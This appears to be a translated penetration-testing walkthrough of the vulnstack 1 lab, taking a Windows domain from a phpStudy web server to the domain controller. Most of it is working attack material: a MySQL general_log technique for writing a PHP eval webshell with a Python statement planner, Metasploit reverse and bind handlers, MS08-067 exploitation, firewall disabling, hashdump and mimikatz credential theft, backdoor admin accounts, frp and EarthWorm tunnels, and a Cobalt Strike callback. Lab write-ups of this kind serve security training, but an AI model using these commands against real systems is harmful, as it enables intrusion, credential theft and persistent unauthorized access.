红日靶机一 (Hongri Range 1, vulnstack 1)
I. Getting a shell
![](https://upload-images.jianshu.io/upload_images/4664072-93b9c58a35a7c8a8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
show variables like '%general%'; #check whether the general query log is on and which file it writes to
![](https://upload-images.jianshu.io/upload_images/4664072-6173aab7ccd0f140.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
When general_log is ON, every statement the server executes is appended to the file named by general_log_file (here stu1.log). If that variable can be pointed at a path under the web root, the logged statements land in a .php file and PHP executes whatever PHP tags they contain, which gives a shell. This needs the MySQL account to hold SUPER (SYSTEM_VARIABLES_ADMIN on 8.0), because SET GLOBAL fails without it, and the mysqld service account must be able to write under the web root (usually true for an all-in-one phpStudy install). secure_file_priv does not get in the way: it only restricts SELECT ... INTO OUTFILE and LOAD DATA, not where the server writes its own log. Turn the log on:
SET GLOBAL general_log='on'
![](https://upload-images.jianshu.io/upload_images/4664072-d0bc7a1969cb2e9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SHOW VARIABLES LIKE '%secure%' #check secure_file_priv; when it is set, INTO OUTFILE cannot write into the web root, which is why the log-file route is used instead
![](https://upload-images.jianshu.io/upload_images/4664072-9b02f08eaa0ced98.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
SET GLOBAL general_log_file='C:/phpStudy/www/test1.php' #redirect the log into the web root (forward slashes avoid escaping problems in the string literal)
![](https://upload-images.jianshu.io/upload_images/4664072-c1588dc84477d436.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Write the one-line webshell. The statement text is logged verbatim, PHP tags included; the log header around it is plain text that the PHP interpreter ignores. Afterwards, point general_log_file back at the original log and turn general_log off, otherwise every later query keeps growing the .php file.
SELECT '<?php eval($_POST["cmd"]);?>'
![](https://upload-images.jianshu.io/upload_images/4664072-1a0b653768a9351d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
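To make the preconditions explicit, here is an added Python helper (not from the original post) that takes the SHOW VARIABLES and SHOW GRANTS results, decides whether the general_log route is viable for the connected account, and emits the ordered statements including the cleanup that restores the log. The sample variable and grant rows are constructed to mirror a default phpStudy MySQL; the web root and file name are the ones used above.

```python
"""Pre-flight checks and statement plan for the MySQL general_log webshell
write (SHOW VARIABLES -> SET GLOBAL -> SELECT '<?php ...').
Added example, not code from the original post. The SHOW VARIABLES / SHOW GRANTS
rows below are constructed to mirror a default phpStudy MySQL."""
import re

# Constructed: rows from SHOW VARIABLES LIKE '%general%' and '%secure%'.
SAMPLE_VARIABLES = {
    "general_log": "OFF",
    "general_log_file": "C:\\phpStudy\\MySQL\\data\\stu1.log",
    "secure_file_priv": "NULL",  # gates INTO OUTFILE / LOAD DATA, not the general log
}
# Constructed: SHOW GRANTS FOR CURRENT_USER() on the phpStudy root account.
SAMPLE_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]

ONE_LINER = '<?php eval($_POST["cmd"]);?>'


def has_set_global_privilege(grants):
    """SET GLOBAL needs SUPER (5.x) or SYSTEM_VARIABLES_ADMIN (8.0+); a global
    ALL PRIVILEGES grant implies both. Anything narrower means the technique
    stops at the first SET GLOBAL."""
    for g in grants:
        if " ON *.* " not in g:
            continue
        if "ALL PRIVILEGES" in g or re.search(r"\b(SUPER|SYSTEM_VARIABLES_ADMIN)\b", g):
            return True
    return False


def mysql_path(win_path):
    """MySQL on Windows accepts forward slashes, which avoids backslash
    escaping inside the SQL string literal."""
    return win_path.replace("\\", "/")


def plan_general_log_write(variables, grants, webroot, filename, payload=ONE_LINER):
    """Return (ok, reason, statements). statements is the ordered SQL to send,
    ending with the cleanup that puts the log back where it was."""
    if not has_set_global_privilege(grants):
        return False, "account lacks SUPER / SYSTEM_VARIABLES_ADMIN", []
    if "'" in payload:
        return False, "payload contains a single quote; use double quotes inside the PHP", []
    target = mysql_path(webroot.rstrip("\\/")) + "/" + filename
    statements = [
        "SET GLOBAL general_log = 'ON';",
        f"SET GLOBAL general_log_file = '{target}';",
        # The statement text is logged verbatim, PHP tags included; PHP ignores
        # the surrounding log header lines.
        f"SELECT '{payload}';",
        # Cleanup: redirect the log back and restore the original on/off state,
        # otherwise every later query keeps growing the file in the web root.
        f"SET GLOBAL general_log_file = '{mysql_path(variables['general_log_file'])}';",
        f"SET GLOBAL general_log = '{variables['general_log']}';",
    ]
    # Not checkable from SQL: the mysqld service account must be able to write
    # under the web root, and the web server must execute .php files there.
    return True, "ok", statements


if __name__ == "__main__":
    ok, reason, stmts = plan_general_log_write(
        SAMPLE_VARIABLES, SAMPLE_GRANTS, "C:\\phpStudy\\www", "test1.php")
    print(reason)
    for s in stmts:
        print(s)
```

The plan is a list rather than a live connection on purpose: run it through whatever client is at hand (phpMyAdmin, as in the screenshots, or a mysql session), and keep the two cleanup statements, since a forgotten redirected log is both noisy and a file that keeps growing under the web root.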
Bring the host online in Cobalt Strike (CS):
![](https://upload-images.jianshu.io/upload_images/4664072-09169dd71a3befe5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ef02941681668b91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
shell ipconfig
![](https://upload-images.jianshu.io/upload_images/4664072-60af0302d4bf7dfe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-64edea5ca78abb93.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
shell systeminfo
![](https://upload-images.jianshu.io/upload_images/4664072-3835ed1070196c95.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf exploit(handler) > set lport 2222
lport => 2222
msf exploit(handler) > exploit
![](https://upload-images.jianshu.io/upload_images/4664072-8b4ccf862ffe004d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-bca1355b41f115d7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
getsystem: privilege escalation to SYSTEM succeeded
![](https://upload-images.jianshu.io/upload_images/4664072-6bbb71a52d22d85b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Migrate into a more stable process, so the session does not die when the web server worker that spawned it is recycled
![](https://upload-images.jianshu.io/upload_images/4664072-d895178f93a57aaa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-39bbedc7066451f7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Disable the firewall (legacy netsh firewall syntax; deprecated in favour of netsh advfirewall since Vista/2008 but still accepted):
netsh firewall set opmode disable
![](https://upload-images.jianshu.io/upload_images/4664072-eb850a2cb587bad3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Dump credentials. hashdump reads the NTLM hashes out of the SAM and needs the SYSTEM token obtained above:
run hashdump
![](https://upload-images.jianshu.io/upload_images/4664072-3ea228252f05df3d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
load mimikatz #legacy Meterpreter extension; newer Metasploit ships it as kiwi (load kiwi, then creds_wdigest)
![](https://upload-images.jianshu.io/upload_images/4664072-228f01a83b60a590.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
wdigest #plaintext only on hosts that still cache WDigest credentials in LSASS (pre-KB2871997 systems, or UseLogonCredential=1)
![](https://upload-images.jianshu.io/upload_images/4664072-4ae1cf09ef14781e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Or do the same directly from CS:
![](https://upload-images.jianshu.io/upload_images/4664072-2b8e84c8ebe8d225.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-42a8b1c063664283.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
netsh advfirewall set allprofiles state off #disable the firewall for all profiles (current syntax)
Remote login: enable RDP (3389) by clearing fDenyTSConnections. The key path contains a space, so quote it as a whole:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
![](https://upload-images.jianshu.io/upload_images/4664072-faadf48a3349652a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Add a local administrator account (generic form, then the account used here):
net user username password /add
net localgroup administrators username /add
net user bienao 123.com /add
net localgroup administrators bienao /add
![](https://upload-images.jianshu.io/upload_images/4664072-d8486030bdc8b642.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Switch the console to code page 65001 (UTF-8) so non-ASCII output is not garbled:
chcp 65001
![](https://upload-images.jianshu.io/upload_images/4664072-17b7f00c5d1e6999.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Connect over RDP from Kali to the foothold's external interface:
rdesktop 192.168.44.128:3389
![](https://upload-images.jianshu.io/upload_images/4664072-eb7a8f3d8fa993d8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-61a683b4c05dc36c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Enumerate hosts in the domain (the post module queries Active Directory for computer objects through the session's domain context; the full module name is post/windows/gather/enum_ad_computers):
run windows/gather/enum_ad_computers
Add a route so Metasploit can reach the internal 192.168.52.0/24 subnet through this session (the autoroute script is deprecated; post/multi/manage/autoroute is the current module with the same options):
run autoroute -s 192.168.52.0/24
run autoroute -p #print the routing table to confirm
![](https://upload-images.jianshu.io/upload_images/4664072-43a864a1192a6f08.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Information gathering
![](https://upload-images.jianshu.io/upload_images/4664072-11202676934d9646.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d86b445f60c6e0e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Identify the domain controller. net view /domain lists the domains visible from this host; net time /domain asks a domain controller for the time and names it in the reply:
shell net view /domain
shell net time /domain
![](https://upload-images.jianshu.io/upload_images/4664072-1e55d8b4de68b4ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Ping sweep from the foothold's cmd (-n 1 sends one echo request; -w is the timeout in milliseconds, so 2 ms only works because the lab hosts share a virtual switch; a few hundred is safer on real networks):
for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i
![](https://upload-images.jianshu.io/upload_images/4664072-c2b876447e15c2f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
arp -a #host discovery from the ARP cache; also catches hosts that drop ICMP but answered ARP
![](https://upload-images.jianshu.io/upload_images/4664072-69b1cd7f046a05eb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
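Reading a 254-host sweep by eye is error-prone, so here is an added Python parser (not from the original post) that turns the ping loop output and the arp -a table into one live-host list with a TTL-based OS hint, and shows why both sources matter: a host that drops ICMP still appears in ARP. The sample outputs are constructed; the 192.168.52.140 and 192.168.52.200 hosts, all MAC addresses and the Linux box are invented for illustration.

```python
"""Turn the cmd.exe ping sweep and `arp -a` output from the foothold into a
live-host table with a TTL-based OS hint. Added example, not part of the
original post; both sample outputs are constructed."""
import re

# Constructed: trimmed output of
#   for /L %i IN (1,1,254) DO ping -w 200 -n 1 192.168.52.%i
PING_OUTPUT = """\
Pinging 192.168.52.137 with 32 bytes of data:
Request timed out.
Pinging 192.168.52.138 with 32 bytes of data:
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Pinging 192.168.52.141 with 32 bytes of data:
Reply from 192.168.52.141: bytes=32 time=1ms TTL=128
Pinging 192.168.52.143 with 32 bytes of data:
Reply from 192.168.52.143: bytes=32 time<1ms TTL=128
Pinging 192.168.52.200 with 32 bytes of data:
Reply from 192.168.52.200: bytes=32 time=2ms TTL=64
Pinging 192.168.52.254 with 32 bytes of data:
Reply from 192.168.52.143: Destination host unreachable.
"""

# Constructed: `arp -a` on the same host. 192.168.52.140 answers ARP but not
# ICMP (host firewall), so it only shows up here.
ARP_OUTPUT = """\
Interface: 192.168.52.143 --- 0xb
  Internet Address      Physical Address      Type
  192.168.52.138        00-0c-29-1a-2b-3c     dynamic
  192.168.52.140        00-0c-29-4d-5e-6f     dynamic
  192.168.52.141        00-0c-29-7a-8b-9c     dynamic
  192.168.52.255        ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Only a real echo reply carries "bytes=... TTL=..."; timeouts and the
# "Destination host unreachable" line (which names *our own* address) do not.
PING_RE = re.compile(r"^Reply from (\d{1,3}(?:\.\d{1,3}){3}): bytes=\d+ time[<=]\d+ms TTL=(\d+)$")
# Keep dynamic ARP entries only; broadcast and multicast rows are static.
ARP_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+dynamic\s*$", re.I)


def os_from_ttl(ttl):
    """Default initial TTLs: 64 Linux/Unix, 128 Windows, 255 network gear.
    Hops only decrement, so bucket upward to the nearest default."""
    if ttl <= 64:
        return "Linux/Unix"
    if ttl <= 128:
        return "Windows"
    return "network device"


def parse_ping_sweep(text):
    hosts = {}
    for line in text.splitlines():
        m = PING_RE.match(line.strip())
        if m:
            ip, ttl = m.group(1), int(m.group(2))
            hosts[ip] = {"ip": ip, "ttl": ttl, "os_guess": os_from_ttl(ttl), "mac": None}
    return hosts


def merge_arp(hosts, text):
    for line in text.splitlines():
        m = ARP_RE.match(line)
        if m:
            ip, mac = m.group(1), m.group(2).lower()
            hosts.setdefault(ip, {"ip": ip, "ttl": None, "os_guess": "unknown", "mac": None})
            hosts[ip]["mac"] = mac
    return hosts


def live_hosts(ping_text=PING_OUTPUT, arp_text=ARP_OUTPUT):
    """Union of ICMP and ARP evidence, sorted numerically by address."""
    hosts = merge_arp(parse_ping_sweep(ping_text), arp_text)
    return sorted(hosts.values(), key=lambda h: tuple(int(o) for o in h["ip"].split(".")))


if __name__ == "__main__":
    for h in live_hosts():
        print(f"{h['ip']:<16} ttl={str(h['ttl']):<5} {h['os_guess']:<15} {h['mac'] or '-'}")
```

Paste the real sweep and arp -a output into the two strings (or read them from files saved off the meterpreter shell); the host running the sweep never lists itself in its own ARP cache, so a missing MAC on one Windows entry is expected.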
Run the NSE vulnerability scripts against the discovered hosts (when this is done from Kali through the SOCKS proxy set up below, it has to be proxychains nmap with -sT -Pn: SOCKS only carries TCP connects, never raw packets):
nmap --script=vuln 192.168.52.141
![](https://upload-images.jianshu.io/upload_images/4664072-29896b933474fefb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap --script=vuln 192.168.52.138
Edit frps.ini on the Kali side:
vim frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-fd6ad65b30c4d325.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Start the frp server:
./frps -c frps.ini
![](https://upload-images.jianshu.io/upload_images/4664072-59759ef10dac7686.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-58adf9fd11f10dfc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
frpc.exe -c frpc.ini #on the foothold: the client registers with frps and exposes the SOCKS listener on the server side
![](https://upload-images.jianshu.io/upload_images/4664072-7e77b84f5d608284.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
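The post only shows frps.ini as a screenshot. Below is a minimal working pair for frp's built-in socks5 plugin, written here as an added example rather than copied from the post: the port numbers, the token and 192.168.44.129 as the Kali address are assumptions (the msf handler above uses that address as lhost).

```ini
; frps.ini - on Kali (192.168.44.129, assumed), reachable from the foothold's 192.168.44.x interface
[common]
bind_port = 7000
; assumed shared secret: without it, any host that can reach 7000 may register a proxy through this server
token = CHANGE_ME
; keep the SOCKS port off the lab network; only local tools (proxychains) need it
proxy_bind_addr = 127.0.0.1

; frpc.ini - on the foothold web server, started with: frpc.exe -c frpc.ini
[common]
server_addr = 192.168.44.129
server_port = 7000
token = CHANGE_ME

; frpc runs a SOCKS5 server in-process and frps exposes it on remote_port
[socks5]
type = tcp
remote_port = 1080
plugin = socks5
```

proxychains on Kali then points at socks5 127.0.0.1 1080. Traffic enters the internal 192.168.52.0/24 subnet from the foothold's own interface, which is why the nmap and rdesktop commands run through proxychains see the 192.168.52.x addresses even though Kali has no route to them.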
Alternatively, with EarthWorm (the addresses here come from a different lab run than the rest of the write-up):
Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024
This makes the attacker-side server listen on 1080 and 1024: the attacker's tools connect to 1080 (the SOCKS port), and the target connects in to 1024 and becomes the forwarder.
windows: .\ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024
![](https://upload-images.jianshu.io/upload_images/4664072-9613b25669a5baac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-debd4aa278762466.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Proxy tooling through it with proxychains: add a socks5 entry for the listener (127.0.0.1, port 1080 for the frp and ew setups above) at the end of the ProxyList in:
vi /etc/proxychains.conf
![](https://upload-images.jianshu.io/upload_images/4664072-f93ff1dd298fb088.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
With the route or proxy in place, run MS08-067 against the host scanned above (192.168.52.141). The payload is bind_tcp rather than reverse_tcp: the internal host has no route back to the 192.168.44.x attacker address, but Metasploit can connect in to it over the pivot:
msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141
rhosts => 192.168.52.141
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run
![](https://upload-images.jianshu.io/upload_images/4664072-e003736fdef8f608.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Same post-exploitation on the new host:
net user bienao 123.com /add
net localgroup administrators bienao /add
netsh advfirewall set allprofiles state off #disable the firewall
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f #enable 3389
![](https://upload-images.jianshu.io/upload_images/4664072-365a3abf21dfb83a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Remote connection:
rdesktop 192.168.44.141:3389
The RDP attempt failed. That address is not the target: the host lives on 192.168.52.141, which Kali cannot reach directly, so the client has to go through the SOCKS proxy (proxychains rdesktop 192.168.52.141) or a port forward on the foothold.
getuid
run hashdump
load mimikatz #load the mimikatz extension first; wdigest and kerberos are its commands
wdigest #WDigest credentials from LSASS, plaintext on unpatched older Windows
kerberos #Kerberos credentials from LSASS, plaintext where they are stored
![](https://upload-images.jianshu.io/upload_images/4664072-443461888fbce4ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Send the domain-controller session back to CS. payload_inject spawns a reverse_http stager inside session 2 and, with disablepayloadhandler set, leaves the callback to the CS HTTP Beacon listener on 192.168.44.129:1111 instead of starting an MSF handler. This only works if that host can actually reach 192.168.44.129; a host with nothing but a 192.168.52.x address needs a pivot listener or port forward on the foothold instead:
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf5 exploit(windows/local/payload_inject) > set lport 1111
lport => 1111
msf5 exploit(windows/local/payload_inject) > set session 2
session => 2
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf5 exploit(windows/local/payload_inject) > run
![](https://upload-images.jianshu.io/upload_images/4664072-df0a21a44847c34a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Further reading
https://blog.csdn.net/qq_42349134/article/details/103135062
https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F